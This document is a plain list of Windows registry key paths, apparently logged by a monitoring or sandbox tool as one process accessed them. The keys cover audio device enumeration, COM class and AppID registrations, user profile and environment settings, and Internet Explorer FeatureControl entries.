HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39B8AF29&0&0001
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\DeviceDesc
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Control Panel\International
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Control Panel\International\LocaleName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Data
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994ad04-93ef-11d0-a3cc-00a0c9223196}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#elineoutwave
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutWave\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutWave\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\Properties
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{eb115ffc-10c8-4964-831d-6dcb02e6f23f}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39b8af29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\#elineoutwave
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39b8af29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\#eLineOutWave\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\#eLineOutWave\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\Properties
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#elineouttopo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineInTopo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineInWave
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutWave
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\ConfigFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000\Data
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutWave\Properties
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Power\PowerRequestOverride
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Power\PowerRequestOverride
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerRequestOverride\Driver
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000_Classes
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000_CLASSES\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\ProgID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\AppID
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000_CLASSES\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\DllSurrogate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LaunchPermission
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\LegacyAuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\LegacyImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LoadUserSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\Elevation
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2476309959-3960023044-3115063449-1000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2476309959-3960023044-3115063449-1000\ProfileImagePath
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Environment
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Volatile Environment
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Volatile Environment\0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\Com+Enabled
HKEY_CURRENT_USER\Software\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AccessPermission
HKEY_CURRENT_USER\Software\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\MaxSxSHashCount
HKEY_CURRENT_USER\Software\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLE_PASSPORT_SESSION_STORE_KB948608
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
